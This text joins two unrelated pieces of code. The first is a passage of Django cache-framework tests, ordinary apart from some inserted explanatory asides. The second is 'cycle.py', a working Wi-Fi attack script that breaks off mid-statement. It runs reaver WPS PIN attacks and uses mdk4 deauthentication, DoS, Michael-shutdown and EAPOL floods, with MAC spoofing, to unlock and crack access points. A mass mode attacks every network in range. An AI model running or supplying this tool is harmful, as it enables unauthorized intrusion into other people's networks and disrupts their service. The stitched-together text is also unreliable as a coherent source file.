'/cache/test/' self.factory = RequestFactory() def tearDown(self): cache.clear() @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False) def test_cache_key_i18n_translation(self): request = self.factory.get(self.path) lang = translation.get_language() response = HttpResponse() key = learn_cache_key(request, response) self.assertIn(lang, key, "Cache keys should include the language name when translation is active") key2 = get_cache_key(request) self.assertEqual(key, key2) def check_accept_language_vary(self, accept_language, vary, reference_key): request = self.factory.get(self.path) request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language 
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0' response = HttpResponse() response['Vary'] = vary key = learn_cache_key(request, response) key2 = get_cache_key(request) self.assertEqual(key, reference_key) self.assertEqual(key2, reference_key) @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False) def test_cache_key_i18n_translation_accept_language(self): lang = translation.get_language() self.assertEqual(lang, 'en') request = self.factory.get(self.path) request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0' response = HttpResponse() response['Vary'] = 'accept-encoding' key = learn_cache_key(request, response) self.assertIn(lang, key, "Cache keys should include the language name when translation is active") self.check_accept_language_vary( 'en-us', 'cookie, accept-language, accept-encoding', key ) self.check_accept_language_vary( 'en-US', 'cookie, accept-encoding, accept-language', key ) self.check_accept_language_vary( 'en-US,en;q=0.8', 'accept-encoding, accept-language, cookie', key ) self.check_accept_language_vary( 'en-US,en;q=0.8,ko;q=0.6', 'accept-language, cookie, accept-encoding', key ) self.check_accept_language_vary( 'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ', 'accept-encoding, cookie, accept-language', key ) self.check_accept_language_vary( 'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4', 'accept-language, accept-encoding, cookie', key ) self.check_accept_language_vary( 'ko;q=1.0,en;q=0.5', 'cookie, accept-language, accept-encoding', key ) self.check_accept_language_vary( 'ko, en', 'cookie, accept-encoding, accept-language', key ) self.check_accept_language_vary( 'ko-KR, en-US', 'accept-encoding, accept-language, cookie', key ) @override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False) def test_cache_key_i18n_formatting(self): request = self.factory.get(self.path) lang = translation.get_language() response = HttpResponse() key = learn_cache_key(request, response) self.assertIn(lang, key, "Cache keys should include the language name when formatting is active") key2 = get_cache_key(request) self.assertEqual(key, key2) @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True) def test_cache_key_i18n_timezone(self): request = self.factory.get(self.path) # This is tightly coupled to the implementation, # but it's the most straightforward way to test the key. 
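# The sanitation below matches what the cache key code does to the time zone name: non-ASCII characters are dropped and spaces become underscores (cf. test_cache_key_with_non_ascii_tzname).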
tz = force_text(timezone.get_current_timezone_name(), errors='ignore') tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_') response = HttpResponse() key = learn_cache_key(request, response) self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active") key2 = get_cache_key(request) self.assertEqual(key, key2) @override_settings(USE_I18N=False, USE_L10N=False) def test_cache_key_no_i18n(self): request = self.factory.get(self.path) lang = translation.get_language() tz = force_text(timezone.get_current_timezone_name(), errors='ignore') tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_') response = HttpResponse() key = learn_cache_key(request, response) self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active") self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active") @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True) def test_cache_key_with_non_ascii_tzname(self): # Regression test for #17476 class CustomTzName(timezone.UTC): name = '' def tzname(self, dt): return self.name request = self.factory.get(self.path) response = HttpResponse() with timezone.override(CustomTzName()): CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string sanitized_name = 'Hora_estndar_de_Argentina' self.assertIn(sanitized_name, learn_cache_key(request, response), "Cache keys should include the time zone name when time zones are active") CustomTzName.name = 'Hora estándar de Argentina' # unicode sanitized_name = 'Hora_estndar_de_Argentina' self.assertIn(sanitized_name, learn_cache_key(request, response), "Cache keys should include the time zone name when time zones are active") @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX="test", CACHE_MIDDLEWARE_SECONDS=60, USE_ETAGS=True, USE_I18N=True, ) def test_middleware(self): def set_cache(request, lang, msg): translation.activate(lang) response = HttpResponse() response.content = msg return UpdateCacheMiddleware().process_response(request, response) # cache with non empty request.GET request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'}) request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) # first access, cache must return None self.assertEqual(get_cache_data, None) response = HttpResponse() content = 'Check for cache with QUERY_STRING' response.content = content UpdateCacheMiddleware().process_response(request, response) get_cache_data = FetchFromCacheMiddleware().process_request(request) # cache must return content self.assertNotEqual(get_cache_data, None) self.assertEqual(get_cache_data.content, content.encode()) # different QUERY_STRING, cache must be empty request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'}) request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data, None) # i18n tests en_message = "Hello world!" es_message = "Hola mundo!" 
request = self.factory.get(self.path) request._cache_update_cache = True set_cache(request, 'en', en_message) get_cache_data = FetchFromCacheMiddleware().process_request(request) # Check that we can recover the cache self.assertNotEqual(get_cache_data, None) self.assertEqual(get_cache_data.content, en_message.encode()) # Check that we use etags self.assertTrue(get_cache_data.has_header('ETag')) # Check that we can disable etags with self.settings(USE_ETAGS=False): request._cache_update_cache = True set_cache(request, 'en', en_message) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertFalse(get_cache_data.has_header('ETag')) # change the session language and set content request = self.factory.get(self.path) request._cache_update_cache = True set_cache(request, 'es', es_message) # change again the language translation.activate('en') # retrieve the content from cache get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data.content, en_message.encode()) # change again the language translation.activate('es') get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data.content, es_message.encode()) # reset the language translation.deactivate() @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX="test", CACHE_MIDDLEWARE_SECONDS=60, USE_ETAGS=True, ) def test_middleware_doesnt_cache_streaming_response(self): request = self.factory.get(self.path) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNone(get_cache_data) # This test passes on Python < 3.3 even without the corresponding code # in UpdateCacheMiddleware, because pickling a StreamingHttpResponse # fails (http://bugs.python.org/issue14288). LocMemCache silently # swallows the exception and doesn't store the response in cache. content = ['Check for cache with streaming content.'] response = StreamingHttpResponse(content) UpdateCacheMiddleware().process_response(request, response) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNone(get_cache_data) @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'KEY_PREFIX': 'cacheprefix' }, }, ) class PrefixedCacheI18nTest(CacheI18nTest): pass def hello_world_view(request, value): return HttpResponse('Hello World %s' % value) @override_settings( CACHE_MIDDLEWARE_ALIAS='other', CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix', CACHE_MIDDLEWARE_SECONDS=30, CACHE_MIDDLEWARE_ANONYMOUS_ONLY=False, CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, 'other': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': 'other', 'TIMEOUT': '1', }, }, ) class CacheMiddlewareTest(IgnoreDeprecationWarningsMixin, TestCase): def setUp(self): super(CacheMiddlewareTest, self).setUp() self.factory = RequestFactory() self.default_cache = caches['default'] self.other_cache = caches['other'] def tearDown(self): self.default_cache.clear() self.other_cache.clear() super(CacheMiddlewareTest, self).tearDown() def test_constructor(self): """ Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as Middleware vs. usage of CacheMiddleware as view decorator and setting attributes appropriately. """ # If no arguments are passed in construction, it's being used as middleware. 
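# --- Illustrative aside (not part of the original test suite) ---
# The i18n tests above all hinge on one mechanism: when USE_I18N, USE_L10N or
# USE_TZ is enabled, the active language and/or time zone name is folded into
# the cache key, so one URL can cache a variant per locale. The helper below
# is a deliberately simplified sketch of that idea using only the standard
# library -- it is not Django's learn_cache_key(), and `make_locale_key` is a
# hypothetical name:
import hashlib


def make_locale_key(path, lang=None, tzname=None, key_prefix=''):
    """Build a cache key that varies by language and time zone name."""
    url_hash = hashlib.md5(path.encode()).hexdigest()
    # Mirror the sanitizing the tests exercise: ASCII only, spaces to underscores.
    tz_part = (tzname or '').encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
    return 'cache_page.%s.%s.%s.%s' % (key_prefix, url_hash, lang or '', tz_part)


# Example: the English and Spanish variants of one URL get distinct keys.
assert make_locale_key('/cache/test/', 'en') != make_locale_key('/cache/test/', 'es')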
def hello_world_view(request, value):
    return HttpResponse('Hello World %s' % value)


@override_settings(
    CACHE_MIDDLEWARE_ALIAS='other',
    CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
    CACHE_MIDDLEWARE_SECONDS=30,
    CACHE_MIDDLEWARE_ANONYMOUS_ONLY=False,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
        'other': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'LOCATION': 'other',
            'TIMEOUT': '1',
        },
    },
)
class CacheMiddlewareTest(IgnoreDeprecationWarningsMixin, TestCase):

    def setUp(self):
        super(CacheMiddlewareTest, self).setUp()
        self.factory = RequestFactory()
        self.default_cache = caches['default']
        self.other_cache = caches['other']

    def tearDown(self):
        self.default_cache.clear()
        self.other_cache.clear()
        super(CacheMiddlewareTest, self).tearDown()

    def test_constructor(self):
        """
        Ensure the constructor is correctly distinguishing between usage of
        CacheMiddleware as Middleware vs. usage of CacheMiddleware as view
        decorator and setting attributes appropriately.
        """
        # If no arguments are passed in construction, it's being used as middleware.
        middleware = CacheMiddleware()

        # Now test object attributes against values defined in setUp above
        self.assertEqual(middleware.cache_timeout, 30)
        self.assertEqual(middleware.key_prefix, 'middlewareprefix')
        self.assertEqual(middleware.cache_alias, 'other')
        self.assertEqual(middleware.cache_anonymous_only, False)

        # If arguments are being passed in construction, it's being used as a decorator.
        # First, test with "defaults":
        as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)

        self.assertEqual(as_view_decorator.cache_timeout, 30)  # Timeout value for 'default' cache, i.e. 30
        self.assertEqual(as_view_decorator.key_prefix, '')
        self.assertEqual(as_view_decorator.cache_alias, 'default')  # Value of DEFAULT_CACHE_ALIAS from django.core.cache
        self.assertEqual(as_view_decorator.cache_anonymous_only, False)

        # Next, test with custom values:
        as_view_decorator_with_custom = CacheMiddleware(cache_anonymous_only=True, cache_timeout=60,
                                                        cache_alias='other', key_prefix='foo')

        self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
        self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
        self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
        self.assertEqual(as_view_decorator_with_custom.cache_anonymous_only, True)

    def test_middleware(self):
        middleware = CacheMiddleware()
        prefix_middleware = CacheMiddleware(key_prefix='prefix1')
        timeout_middleware = CacheMiddleware(cache_timeout=1)

        request = self.factory.get('/view/')

        # Put the request through the request middleware
        result = middleware.process_request(request)
        self.assertEqual(result, None)

        response = hello_world_view(request, '1')

        # Now put the response through the response middleware
        response = middleware.process_response(request, response)

        # Repeating the request should result in a cache hit
        result = middleware.process_request(request)
        self.assertNotEqual(result, None)
        self.assertEqual(result.content, b'Hello World 1')

        # The same request through a different middleware won't hit
        result = prefix_middleware.process_request(request)
        self.assertEqual(result, None)

        # The same request with a timeout _will_ hit
        result = timeout_middleware.process_request(request)
        self.assertNotEqual(result, None)
        self.assertEqual(result.content, b'Hello World 1')

    @override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
    def test_cache_middleware_anonymous_only_wont_cause_session_access(self):
        """
        The cache middleware shouldn't cause a session access due to
        CACHE_MIDDLEWARE_ANONYMOUS_ONLY if nothing else has accessed the
        session.

        Refs 13283
        """
        from django.contrib.sessions.middleware import SessionMiddleware
        from django.contrib.auth.middleware import AuthenticationMiddleware

        middleware = CacheMiddleware()
        session_middleware = SessionMiddleware()
        auth_middleware = AuthenticationMiddleware()

        request = self.factory.get('/view_anon/')

        # Put the request through the request middleware
        session_middleware.process_request(request)
        auth_middleware.process_request(request)
        result = middleware.process_request(request)
        self.assertEqual(result, None)

        response = hello_world_view(request, '1')

        # Now put the response through the response middleware
        session_middleware.process_response(request, response)
        response = middleware.process_response(request, response)

        self.assertEqual(request.session.accessed, False)

    @override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
    def test_cache_middleware_anonymous_only_with_cache_page(self):
        """CACHE_MIDDLEWARE_ANONYMOUS_ONLY should still be effective when used
        with the cache_page decorator: the response to a request from an
        authenticated user should not be cached."""
        request = self.factory.get('/view_anon/')

        class MockAuthenticatedUser(object):
            def is_authenticated(self):
                return True

        class MockAccessedSession(object):
            accessed = True

        request.user = MockAuthenticatedUser()
        request.session = MockAccessedSession()

        response = cache_page(60)(hello_world_view)(request, '1')

        self.assertFalse("Cache-Control" in response)

    def test_view_decorator(self):
        # decorate the same view with different cache decorators
        default_view = cache_page(3)(hello_world_view)
        default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)

        explicit_default_view = cache_page(3, cache='default')(hello_world_view)
        explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)

        other_view = cache_page(1, cache='other')(hello_world_view)
        other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)

        request = self.factory.get('/view/')

        # Request the view once
        response = default_view(request, '1')
        self.assertEqual(response.content, b'Hello World 1')

        # Request again -- hit the cache
        response = default_view(request, '2')
        self.assertEqual(response.content, b'Hello World 1')

        # Requesting the same view with the explicit cache should yield the same result
        response = explicit_default_view(request, '3')
        self.assertEqual(response.content, b'Hello World 1')

        # Requesting with a prefix will hit a different cache key
        response = explicit_default_with_prefix_view(request, '4')
        self.assertEqual(response.content, b'Hello World 4')

        # Hitting the same view again gives a cache hit
        response = explicit_default_with_prefix_view(request, '5')
        self.assertEqual(response.content, b'Hello World 4')

        # And going back to the implicit cache will hit the same cache
        response = default_with_prefix_view(request, '6')
        self.assertEqual(response.content, b'Hello World 4')

        # Requesting from an alternate cache won't hit cache
        response = other_view(request, '7')
        self.assertEqual(response.content, b'Hello World 7')

        # But a repeated hit will hit cache
        response = other_view(request, '8')
        self.assertEqual(response.content, b'Hello World 7')

        # And prefixing the alternate cache yields yet another cache entry
        response = other_with_prefix_view(request, '9')
        self.assertEqual(response.content, b'Hello World 9')

        # But if we wait a couple of seconds...
        time.sleep(2)

        # ... the default cache will still hit
        caches['default']
        response = default_view(request, '11')
        self.assertEqual(response.content, b'Hello World 1')

        # ... the default cache with a prefix will still hit
        response = default_with_prefix_view(request, '12')
        self.assertEqual(response.content, b'Hello World 4')

        # ... the explicit default cache will still hit
        response = explicit_default_view(request, '13')
        self.assertEqual(response.content, b'Hello World 1')

        # ... the explicit default cache with a prefix will still hit
        response = explicit_default_with_prefix_view(request, '14')
        self.assertEqual(response.content, b'Hello World 4')

        # .. but a rapidly expiring cache won't hit
        response = other_view(request, '15')
        self.assertEqual(response.content, b'Hello World 15')

        # .. even if it has a prefix
        response = other_with_prefix_view(request, '16')
        self.assertEqual(response.content, b'Hello World 16')
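# --- Illustrative aside (not part of the original test suite) ---
# test_constructor above encodes a subtle design point: constructed with no
# arguments (middleware use), CacheMiddleware takes its defaults from
# settings, whereas an explicitly passed keyword -- even an explicit None --
# marks decorator use and wins over settings. A minimal sketch of that
# constructor pattern; `DualUseMiddleware` and `_DemoSettings` are
# hypothetical names, not Django's implementation:
class _DemoSettings(object):
    CACHE_SECONDS = 30
    KEY_PREFIX = 'middlewareprefix'


demo_settings = _DemoSettings()


class DualUseMiddleware(object):
    def __init__(self, **kwargs):
        # Presence of the keyword (even as None) marks decorator usage;
        # absence means middleware usage, which falls back to settings.
        if 'cache_timeout' in kwargs:
            self.cache_timeout = kwargs['cache_timeout']
        else:
            self.cache_timeout = demo_settings.CACHE_SECONDS
        if 'key_prefix' in kwargs:
            self.key_prefix = kwargs['key_prefix'] or ''
        else:
            self.key_prefix = demo_settings.KEY_PREFIX


assert DualUseMiddleware().key_prefix == 'middlewareprefix'  # middleware-style
assert DualUseMiddleware(key_prefix=None).key_prefix == ''   # decorator-style
assert DualUseMiddleware(cache_timeout=60).cache_timeout == 60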
@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHE_MIDDLEWARE_SECONDS=1,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
    """
    Tests various headers w/ TemplateResponse.

    Most are probably redundant since they manipulate the same object
    anyway but the Etag header is 'special' because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse)
    """
    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def test_patch_vary_headers(self):
        headers = (
            # Initial vary, new headers, resulting vary.
            (None, ('Accept-Encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
            ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
        )
        for initial_vary, newheaders, resulting_vary in headers:
            response = TemplateResponse(HttpResponse(), Template("This is a test"))
            if initial_vary is not None:
                response['Vary'] = initial_vary
            patch_vary_headers(response, newheaders)
            self.assertEqual(response['Vary'], resulting_vary)

    def test_get_cache_key(self):
        request = self.factory.get(self.path)
        response = TemplateResponse(HttpResponse(), Template("This is a test"))
        key_prefix = 'localprefix'
        # Expect None if no headers have been set yet.
        self.assertEqual(get_cache_key(request), None)
        # Set headers to an empty list.
        learn_cache_key(request, response)

        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )
        # Verify that a specified key_prefix is taken into account.
        learn_cache_key(request, response, key_prefix=key_prefix)
        self.assertEqual(
            get_cache_key(request, key_prefix=key_prefix),
            'views.decorators.cache.cache_page.localprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_get_cache_key_with_query(self):
        request = self.factory.get(self.path, {'test': 1})
        response = TemplateResponse(HttpResponse(), Template("This is a test"))
        # Expect None if no headers have been set yet.
        self.assertEqual(get_cache_key(request), None)
        # Set headers to an empty list.
        learn_cache_key(request, response)
        # Verify that the querystring is taken into account.
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
        )

    @override_settings(USE_ETAGS=False)
    def test_without_etag(self):
        response = TemplateResponse(HttpResponse(), Template("This is a test"))
        self.assertFalse(response.has_header('ETag'))
        patch_response_headers(response)
        self.assertFalse(response.has_header('ETag'))
        response = response.render()
        self.assertFalse(response.has_header('ETag'))

    @override_settings(USE_ETAGS=True)
    def test_with_etag(self):
        response = TemplateResponse(HttpResponse(), Template("This is a test"))
        self.assertFalse(response.has_header('ETag'))
        patch_response_headers(response)
        self.assertFalse(response.has_header('ETag'))
        response = response.render()
        self.assertTrue(response.has_header('ETag'))


class TestEtagWithAdmin(TestCase):
    # See https://code.djangoproject.com/ticket/16003
    urls = "admin_views.urls"

    def test_admin(self):
        with self.settings(USE_ETAGS=False):
            response = self.client.get('/test_admin/admin/')
            self.assertEqual(response.status_code, 302)
            self.assertFalse(response.has_header('ETag'))

        with self.settings(USE_ETAGS=True):
            response = self.client.get('/test_admin/admin/')
            self.assertEqual(response.status_code, 302)
            self.assertTrue(response.has_header('ETag'))


class TestMakeTemplateFragmentKey(TestCase):
    def test_without_vary_on(self):
        key = make_template_fragment_key('a.fragment')
        self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')

    def test_with_one_vary_on(self):
        key = make_template_fragment_key('foo', ['abc'])
        self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')

    def test_with_many_vary_on(self):
        key = make_template_fragment_key('bar', ['abc', 'def'])
        self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')

    def test_proper_escaping(self):
        key = make_template_fragment_key('spam', ['abc:def%'])
        self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')


class CacheHandlerTest(TestCase):
    def test_same_instance(self):
        """
        Attempting to retrieve the same alias should yield the same instance.
        """
        cache1 = caches['default']
        cache2 = caches['default']

        self.assertTrue(cache1 is cache2)

    def test_per_thread(self):
        """
        Requesting the same alias from separate threads should yield separate
        instances.
        """
        c = []

        def runner():
            c.append(caches['default'])

        for x in range(2):
            t = threading.Thread(target=runner)
            t.start()
            t.join()

        self.assertFalse(c[0] is c[1])
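# --- Illustrative aside (not part of the original test suite) ---
# CacheHandlerTest documents two invariants: within a thread, an alias maps
# to one shared instance; across threads, each thread gets its own. A common
# way to get both properties is a handler backed by threading.local. The
# sketch below shows that pattern in isolation; `DemoCacheHandler` is a
# hypothetical name, not Django's implementation:
import threading


class DemoCacheHandler(object):
    def __init__(self):
        self._local = threading.local()

    def __getitem__(self, alias):
        # Each thread lazily gets its own alias->instance mapping.
        store = getattr(self._local, 'caches', None)
        if store is None:
            store = self._local.caches = {}
        if alias not in store:
            store[alias] = {}  # stand-in for a real cache backend instance
        return store[alias]


demo_caches = DemoCacheHandler()
assert demo_caches['default'] is demo_caches['default']  # same thread: same object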
cycle.py
import datetime
import re
import subprocess
import sys
import threading
import time
from argparse import ArgumentParser
from shutil import which

import pexpect
import psutil
from art import text2art
from loguru import logger

from dateutils import pretty_time_delta

wash_regex = r'^((?:[A-Z0-9]{2}:){5}[A-Z0-9]{2})\s+(\d{1,2})\s+(-?\d{1,2})\s+(1\.0|2\.0)\s+(Yes|No)\s+(\w+)?\s+(.*)'
blacklist_filename = 'blacklist.txt'
rate_limiting_msg = 'WARNING: Detected AP rate limiting'
ON_POSIX = 'posix' in sys.builtin_module_names

num_dos_attacks = 0


def run_wash(channel, interface):
    wash_args = ['wash', '-i', interface]
    if channel:
        wash_args.extend(['-c', str(channel)])
    return subprocess.Popen(wash_args, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)


def run_reaver(interface, no_nacks, channel, bssid, small):
    reaver_args = ['reaver', '-i', interface, '-b', bssid, '-vv']
    if no_nacks:
        reaver_args.append('-N')
    if small:
        reaver_args.append('-S')
    if channel:
        reaver_args.extend(['-c', str(channel)])
    return subprocess.Popen(reaver_args, stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)


def run_mdk4_deauth(bssid, interface, channel):
    logger.debug('Starting deauth')
    mdk4_args = ['mdk4', interface, 'd', '-b', blacklist_filename]
    with open(blacklist_filename, 'w') as f:
        f.write(bssid)
    if channel:
        mdk4_args.extend(['-c', str(channel)])
    return subprocess.Popen(mdk4_args, stdout=subprocess.PIPE)


def run_mdk4_dos(bssid, interface):
    logger.debug('Starting DoS')
    mdk4_args = ['stdbuf', '-oL', '-eL', 'mdk4', interface, 'a', '-m', '-i', bssid]
    return subprocess.Popen(mdk4_args, stdout=subprocess.PIPE, bufsize=1, close_fds=ON_POSIX)


def run_mdk4_michael_shutdown(bssid, interface):
    logger.debug('Starting Michael')
    mdk4_args = ['mdk4', interface, 'm', '-t', bssid]
    return subprocess.Popen(mdk4_args, stdout=subprocess.PIPE)


def run_mdk4_eapol_start(bssid, interface):
    logger.debug('Starting EAPOL')
    mdk4_args = ['mdk4', interface, 'e', '-t', bssid]
    return subprocess.Popen(mdk4_args, stdout=subprocess.PIPE)


def get_wash_output(x):
    # Parse one row of wash's table output into a dict.
    search = re.search(wash_regex, x.decode('utf-8'))
    return {'bssid': search.group(1),
            'channel': search.group(2),
            'strength': search.group(3),
            'wps_version': search.group(4),
            'locked': search.group(5) == 'Yes',
            'vendor': search.group(6),
            'essid': search.group(7)}


def extract_mass_wash_networks(wash_scanned):
    # Unlocked networks first, then by descending signal strength.
    return sorted(filter(lambda y: -int(y['strength']) > 10, wash_scanned),
                  key=lambda x: (x['locked'], -int(x['strength'])))


def run_cycle(bssid, wait_time, channel, wash_time, interface, no_nacks, small, mac_info, attacks):
    print(text2art('Cycle'))
    # print(wikiquote.quote_of_the_day())
    # TODO: Think of a performant way to include something clever
    logger.info('Scanning like a boss')
    wash_scanned = handle_wash(channel, interface, wash_time)
    logger.debug(wash_scanned)
    if bssid:
        found_network = extract_wash_network(bssid, wash_scanned)
        if not found_network:
            logger.error(f'BSSID "{bssid}" not found')
            return
        attack_one(found_network, interface, no_nacks, small, wait_time, wash_time, mac_info, attacks)
    else:
        mass_attack_networks = extract_mass_wash_networks(wash_scanned)
        logger.info(f'Running Massive Attack ;) on {len(mass_attack_networks)} networks')
        for n in mass_attack_networks:
            attack_one(n, interface, no_nacks, small, wait_time, wash_time, mac_info, attacks)


def store_dos_attack_count(p_dos):
    global num_dos_attacks
    for line in iter(p_dos.stdout.readline, b''):
        decoded_line = line.decode()
        for splitline in map(lambda x: x.strip(), decoded_line.splitlines()):
            if splitline:
                logger.trace(splitline)
                # Search the individual sub-line (the original searched the
                # whole chunk on every iteration, re-matching the same text).
                match = re.search(r'Packets sent:\s+(\d+)', splitline)
                if match:
                    num_dos_attacks = int(match.group(1))
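# --- Illustrative aside (not part of the original script) ---
# store_dos_attack_count() above is a small stream-scraping pattern: a daemon
# thread tails a subprocess's stdout and keeps the latest "Packets sent: N"
# counter in a global. The standalone snippet below exercises just the
# parsing step on a made-up sample of mdk4-style output (the sample text is
# invented for illustration, not captured from mdk4):
_sample_output = """\
Trying to connect to the AP...
Packets sent:     1024 (speed: 128 p/s)
Packets sent:     2048 (speed: 130 p/s)
"""

_latest_count = 0
for _demo_line in _sample_output.splitlines():
    _demo_match = re.search(r'Packets sent:\s+(\d+)', _demo_line)
    if _demo_match:
        _latest_count = int(_demo_match.group(1))
assert _latest_count == 2048  # the last counter seen wins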
def attack_one(found_network, interface, no_nacks, small, wait_time, wash_time, mac_info, attacks):
    global num_dos_attacks
    num_dos_attacks = 0
    spoof_mac, mac_address = mac_info
    if spoof_mac and mac_address:
        new_mac = change_mac(interface, mac_address)
        if new_mac:
            logger.info(f'Using custom MAC: {new_mac}')
        else:
            return
    bssid = found_network['bssid']
    channel = found_network['channel']
    attack_dos = attacks['dos']
    attack_deauth = attacks['deauth']
    attack_michael = attacks['michael']
    attack_eapol = attacks['eapol']
    logger.info(f'Attacking {found_network["essid"]} ({found_network["bssid"]})')
    is_locked = False
    latest_network = None
    while True:
        if spoof_mac and not mac_address:
            new_mac = change_mac(interface)
            if new_mac:
                logger.info(f'Fresh, shiny MAC: {new_mac}')
            else:
                return
        else:
            new_mac = None
        if is_locked and not latest_network:
            # first iteration has already run and waited for network to reappear - check again
            logger.info('Scanning again')
            wash_scanned = handle_wash(channel, interface, wash_time)
            latest_network = extract_wash_network(bssid, wash_scanned)
            # guard against the network still being absent (the original
            # indexed latest_network directly and could raise TypeError)
            is_locked = latest_network and latest_network['locked']
        if is_locked:
            # possibly the first iteration - are we still locked?
            logger.warning('Our friend is locked - attack tools to the rescue!')
            last_num_dos_attacks = 0
            p_dos = None
            t_dos = None
            if attack_dos:
                p_dos = run_mdk4_dos(bssid, interface)
                t_dos = threading.Thread(target=store_dos_attack_count, args=(p_dos,))
                t_dos.daemon = True
                t_dos.start()
            p_deauth = run_mdk4_deauth(bssid, interface, channel) if attack_deauth else None
            p_michael = run_mdk4_michael_shutdown(bssid, interface) if attack_michael else None
            p_eapol = run_mdk4_eapol_start(bssid, interface) if attack_eapol else None
            attack_start_time = datetime.datetime.now()
            last_num_dos_check = datetime.datetime.now()
            while True:
                time.sleep(wait_time)
                wash_scanned = handle_wash(channel, interface, wash_time)
                latest_network = extract_wash_network(bssid, wash_scanned)
                is_locked = latest_network and latest_network['locked']
                if not latest_network:
                    logger.warning(f'Network {bssid} not found')
                    break
                if not is_locked:
                    logger.success('Unlocked. Magic. Let\'s ride.')
                    break
                attack_elapsed = datetime.datetime.now() - attack_start_time
                attacks_per_sec = (num_dos_attacks - last_num_dos_attacks) // (
                    datetime.datetime.now() - last_num_dos_check).total_seconds()
                avg_cpu = int(psutil.getloadavg()[0] * 100 // psutil.cpu_count())
                dos_log_line = f' ({format(num_dos_attacks, ",")} DoS attacks) ({format(attacks_per_sec, ",")} a/s)' if attack_dos else ''
                locked_log_line = f'Still locked ({pretty_time_delta(attack_elapsed.total_seconds())}) ({avg_cpu}% CPU){dos_log_line}'
                logger.warning(locked_log_line)
                last_num_dos_attacks = num_dos_attacks
                last_num_dos_check = datetime.datetime.now()
            logger.info('Stopping attack tools')
            if attack_dos and p_dos and p_dos.poll() is None:
